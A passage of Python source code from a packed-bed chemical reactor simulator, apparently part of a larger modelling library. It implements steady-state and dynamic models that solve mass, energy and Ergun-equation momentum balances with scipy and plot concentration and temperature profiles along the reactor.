dxdt.append(dxdt_T)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
dxdt.append(dxdt_P)
return dxdt
# NOTE
# steady-state homogenous modeling
def runM4(self):
"""
M4 modeling case
steady-state modeling
unknowns: Ci,P,T,v
CT, GaDe, are calculated from EOS
"""
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
labelList.append("Pressure")
labelList.append("Velocity")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
indexDensity = indexVelocity + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [mol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [mol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# inlet density [kg/m^3]
GaDe0 = MiMoWe*SpCo0
# var no Ci,T,P,v)
varNo = compNo + 3
# initial values
IV = np.zeros(varNo)
IV[0:compNo] = SpCoi0
IV[indexTemp] = T
IV[indexPressure] = P
IV[indexVelocity] = SuGaVe0
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T
}
}
# save data
timesNo = solverSetting['S3']['timesNo']
# time span
# t = (0.0, rea_L)
t = np.array([0, ReLe])
t_span = np.array([0, ReLe])
times = np.linspace(t_span[0], t_span[1], timesNo)
# tSpan = np.linspace(0, rea_L, 25)
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM4,
t, IV, method="LSODA", t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
dataX = sol.t
# all results
dataYs = sol.y
# concentration [mol/m^3]
dataYs1 = sol.y[0:compNo, :]
labelListYs1 = labelList[0:compNo]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1, axis=0)
dataYs1_MoFri = dataYs1/dataYs1_Ctot
# temperature [K]
dataYs2 = sol.y[indexTemp, :]
labelListYs3 = labelList[indexTemp]
# pressure [Pa]
dataYs3 = sol.y[indexPressure, :]
# velocity [m/s]
dataYs4 = sol.y[indexVelocity, :]
# FIXME
# build matrix
_dataYs = np.concatenate(
(dataYs1_MoFri, [dataYs2]), axis=0)
_dataYsPlot = np.concatenate(
(dataYs1_MoFri, [dataYs2], [dataYs3], [dataYs4]), axis=0)
# plot info
plotTitle = f"Steady-State Modeling [M4] with timesNo: {timesNo}"
# NOTE
# # steady-state result
# # txt
# # ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# # binary
# ssModelingResult = np.load('ResM1.npy')
# # ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataX, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# # datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# check
if successStatus is True:
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataX, _dataYsPlot)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp], dataList[indexPressure], dataList[indexVelocity]]
# select datalist
_dataListsSelected = selectFromListByIndex([0, -3], dataLists)
# subplot result
pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
else:
_dataYs = []
XYList = []
dataList = []
# return
res = {
"dataYs": _dataYs,
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM4(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M4 model
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexVelocity = indexP + 1
# concentration species [mol/m^3]
CoSpi = y[0:compNo]
# temperature [K]
T = y[indexT]
# pressure [Pa]
P = y[indexP]
# velocity
SuGaVe = y[indexVelocity]
# total concentration [mol/m^3]
CoSp = np.sum(CoSpi)
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# total flowrate [mol/s]
# [mol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [mol/s]
MoFlRai = MoFlRa*MoFri
# molar flux [mol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# momentum equation
# REVIEW
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# NOTE
# kinetics
# component formation rate [mol/m^3.s]
# conversion
# FIXME
Ri = 1000*np.array(PackedBedReactorClass.modelReactions(
P, T, MoFri, CaBeDe))
# component formation rate [mol/m^3.s]
# rf[mol/kgcat.s]*CaBeDe[kgcat/m^3]
ri = np.zeros(compNo)
for k in range(compNo):
# reset
_riLoop = 0
for m in range(len(reactionStochCoeff)):
for n in range(len(reactionStochCoeff[m])):
if comList[k] == reactionStochCoeff[m][n][0]:
_riLoop += reactionStochCoeff[m][n][1]*Ri[m]
ri[k] = _riLoop
# overall formation rate [mol/m^3.s]
OvR = np.sum(ri)
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [J/m^3.s]
OvHeReT = np.dot(Ri, HeReT)
# NOTE
#
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [J/m^3.s]
Qm = Ua*(Tm - T)
# REVIEW
# subs df/dt
# NOTE
# diff/dt
dxdt = []
# loop vars
const_C1 = 1/SuGaVe
const_T1 = 1/(MoFl*CpMeanMixture)
const_V1 = 1/CoSp
# RHS of ODE
# energy balance
dxdt_T = const_T1*(-OvHeReT + Qm)
# momentum balance (ergun eq.)
dxdt_P = RHS_ergun
# velocity from global concentration
dxdt_v = const_V1*((-SuGaVe/CONST.R_CONST) *
((1/T)*dxdt_P - (P/T**2)*dxdt_T) + OvR)
# mass balance (concentration) [mol/m^3]
for i in range(compNo):
dxdt_Ci = const_C1*(-CoSpi[i]*dxdt_v + ri[i])
dxdt.append(dxdt_Ci)
# energy balance (temperature) [K]
# dxdt_T = const_T1*(-OvHeReT + Qm)
dxdt.append(dxdt_T)
# momentum balance (ergun equation)
# dxdt_P = RHS_ergun
dxdt.append(dxdt_P)
# velocity [m/s]
dxdt.append(dxdt_v)
return dxdt
# NOTE
# dynamic homogenous modeling
def runM5(self):
"""
M5 modeling case
dynamic model
unknowns: Ci, T (dynamic), P, v (static)
CT, GaDe = f(P, T, n)
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# finite difference points in the z direction
zNo = solverSetting['S2']['zNo']
# length list
dataXs = np.linspace(0, ReLe, zNo)
# element size - dz [m]
dz = ReLe/(zNo-1)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# total var no along the reactor length
varNoT = varNo*zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (varNo, zNo)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for i in range(compNo):
for j in range(zNo):
IV2D[i][j] = SpCoi0[i]
for j in range(zNo):
IV2D[indexTemp][j] = T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi,
"zNo": zNo,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
"dz": dz
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0
},
"reactionRateExpr": reactionRateExpr
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
print(f"time: {t} seconds")
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM5,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise
# time interval
dataTime = sol.t
# all results
dataYs = sol.y
# component concentration [kmol/m^3]
dataYs1 = dataYs[0:varNoCon, -1]
# 2d matrix
dataYs1_Reshaped = np.reshape(dataYs1, (compNo, zNo))
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1_Reshaped, axis=0)
dataYs1_MoFri = dataYs1_Reshaped/dataYs1_Ctot
# temperature - 2d matrix
dataYs2 = np.array([dataYs[varNoCon:varNoT, -1]])
# combine
_dataYs = np.concatenate((dataYs1_MoFri, dataYs2), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCons": dataYs1_Reshaped,
"dataYTemp": dataYs2,
"dataYs": _dataYs
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
# ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM5(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
[dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
zNo: number of finite difference in the z direction
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
dz: differential length [m]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K],
reactionRateExpr: reaction rate expressions
VARS: list of variable
RATES: list of rate expressions
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# dz [m]
dz = const['dz']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# zNo
zNo = const['zNo']
# var no.
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# superficial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate
Ri_z = np.zeros((zNo, reactionListNo))
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# species concentration [kmol/m^3]
CoSpi = np.zeros(compNo)
# reaction rate
ri = np.zeros(compNo)
ri0 = np.zeros(compNo)
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (varNo, zNo))
# -> concentration [mol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
for i in range(compNo):
_SpCoi = yLoop[i, :]
SpCoi_z[i, :] = _SpCoi
# temperature [K]
T_z = np.zeros(zNo)
T_z = yLoop[indexT, :]
# diff/dt
# dxdt = []
# matrix
dxdtMat = np.zeros((varNo, zNo))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(zNo):
## block ##
# FIXME
# concentration species [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# temperature [K]
T = T_z[z]
# pressure [Pa]
P = P_z[z]
# velocity
v = v_z[z]
## calculate ##
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaBeDe[kgcat/m^3]
# r0 = np.array(PackedBedReactorClass.modelReactions(
# P_z[z], T_z[z], MoFri, CaBeDe))
# loop
loopVars0 = (T_z[z], P_z[z], MoFri, CoSpi)
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# r0 = np.copy(RiLoop)
# loop
Ri_z[z, :] = r0
# REVIEW
# component formation rate [kmol/m^3.s]
# call
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_z[z, :])
# overall formation rate [kmol/m^3.s]
OvR = np.sum(ri)
# NOTE
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT = np.dot(Ri_z[z, :], HeReT)
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [kJ/m^3.s]
# if Tm == 0:
# # adiabatic
# Qm0 = 0
# else:
# # heat added/removed from the reactor
# # Tm > T: heat is added (positive sign)
# # T > Tm: heat removed (negative sign)
# Qm0 = (Ua*(Tm - T))*1e-3
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'kJ/m^3.s')
# NOTE
# velocity from global concentration
# check BC
if z == 0:
# BC1
T_b = T0
else:
# interior nodes
T_b = T_z[z - 1]
dxdt_v_T = (T_z[z] - T_b)/dz
# CoSp x 1000
# OvR x 1000
dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
((1/T)*dxdt_P - (P/T**2)*dxdt_v_T) + OvR*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
v_z[z+1] = dxdt_v*dz + v_z[z]
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# loop vars
const_F1 = 1/BeVoFr
const_T1 = MoFl*CpMeanMixture
const_T2 = 1/(CoSp*CpMeanMixture*BeVoFr + (1-BeVoFr)*CaDe*CaSpHeCa)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0:
# BC1
Ci_b = SpCoi0[i]
else:
# interior nodes
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
# backward difference
dCdz = (Ci_c - Ci_b)/dz
# mass balance
dxdt_F = const_F1*(-v_z[z]*dCdz - Ci_c*dxdt_v + ri[i])
dxdtMat[i][z] = dxdt_F
# energy balance (temperature) [K]
# temp [K]
T_c = T_z[z]
# check BC
if z == 0:
# BC1
T_b = T0
else:
# interior nodes
T_b = T_z[z - 1]
# backward difference
dTdz = (T_c - T_b)/dz
dxdt_T = const_T2*(-const_T1*dTdz + (-OvHeReT + Qm))
dxdtMat[indexT][z] = dxdt_T
# flat
dxdt = dxdtMat.flatten().tolist()
print("time: ", t)
return dxdt
# NOTE
#! dynamic heterogenous modeling
def runM6(self):
"""
M6 modeling case
dynamic model
unknowns: Ci, T (dynamic), P, v (static), Cci, Tc (dynamic, for catalyst)
CT, GaDe = f(P, T, n)
numerical method: orthogonal collocation
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
